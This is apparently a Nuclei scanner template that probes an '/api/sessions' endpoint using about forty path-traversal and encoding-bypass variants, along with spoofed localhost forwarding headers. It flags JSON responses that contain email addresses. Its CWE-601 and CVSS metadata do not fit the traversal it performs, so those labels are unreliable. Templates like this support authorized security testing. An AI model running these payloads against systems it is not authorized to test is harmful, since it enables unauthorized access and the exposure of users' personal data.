id: sessions

info:
  name: api-sessions
  author: xandsz
  severity: medium
  description: "Detecta presença de e-mails em respostas HTML"
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  metadata:
    max-request: 2
  tags: fuzzer, generic, email

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/..%2f/sessions"
      - "{{BaseURL}}/api/%2e%2e%2f/sessions"
      - "{{BaseURL}}/api/%252e%252e%252f/sessions"
      - "{{BaseURL}}/api/%c0%ae%c0%ae%c0%afsessions"
      - "{{BaseURL}}/api/%25c0%25ae%25c0%25ae%25c0%25afsessions"
      - "{{BaseURL}}/api/%c0%ae%c0%ae\\sessions"
      - "{{BaseURL}}/api/%25c0%25ae%25c0%25ae\\sessions"
      - "{{BaseURL}}/api/..%5c/sessions"
      - "{{BaseURL}}/api/%2e%2e%5c/sessions"
      - "{{BaseURL}}/api/%252e%252e%255c/sessions"
      - "{{BaseURL}}/api/..\\sessions"
      - "{{BaseURL}}/api/..;/sessions"
      - "{{BaseURL}}/api/.%2e/sessions"
      - "{{BaseURL}}/api/.././sessions"
      - "{{BaseURL}}/api//../sessions"
      - "{{BaseURL}}/api/....//sessions"
      - "{{BaseURL}}/api/%2e%2e\\sessions"
      - "{{BaseURL}}/api/..%c1%9c/sessions"
      - "{{BaseURL}}/api/%%32%66/sessions"
      - "{{BaseURL}}/api/%%32%65%%32%65/sessions"
      - "{{BaseURL}}/api/%%32%65%%32%65%%35%63/sessions"
      - "{{BaseURL}}/api/..%25c1%259c/sessions"
      - "{{BaseURL}}/api/%uff0e%uff0e%u2215sessions"
      - "{{BaseURL}}/api/%uff0e%uff0e\\sessions"
      - "{{BaseURL}}/api/%uff0e%uff0e%u2216sessions"
      - "{{BaseURL}}/api/%2e%2e%2f/sessions"
      - "{{BaseURL}}/api/%252Fsessions"
      - "{{BaseURL}}/api/%252e%252e%252f/sessions"
      - "{{BaseURL}}/api/%FF%2E%FF%2E/sessions"
      - "{{BaseURL}}/api/%2e%2e%2f/sessions"
      - "{{BaseURL}}/api/%2e%2e%2fsessions"
      - "{{BaseURL}}/api/%252e%252esessions"
      - "{{BaseURL}}/api/%2e%2e%2fsessions"
      - "{{BaseURL}}/api/..%2f..%2f/sessions"
      - "{{BaseURL}}/api/..../sessions"
      - "{{BaseURL}}/api/...\\sessions"
      - "{{BaseURL}}/api/........................................................................../sessions"
      - "{{BaseURL}}/api/..........................................................................\\sessions"
      - "{{BaseURL}}/api/%u2215sessions"
      - "{{BaseURL}}/api/%u2216sessions"
      - "{{BaseURL}}/api/%uEFC8sessions"
      - "{{BaseURL}}/api/%uF025sessions"
      - "{{BaseURL}}/%61%70%69/sessions"

    headers:
      User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"
      X-Forwarded-For: "127.0.0.1"
      X-Host: "127.0.0.1"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}'
      - type: word
        part: header
        words:
          - application/json
      - type: status
        status:
          - 200
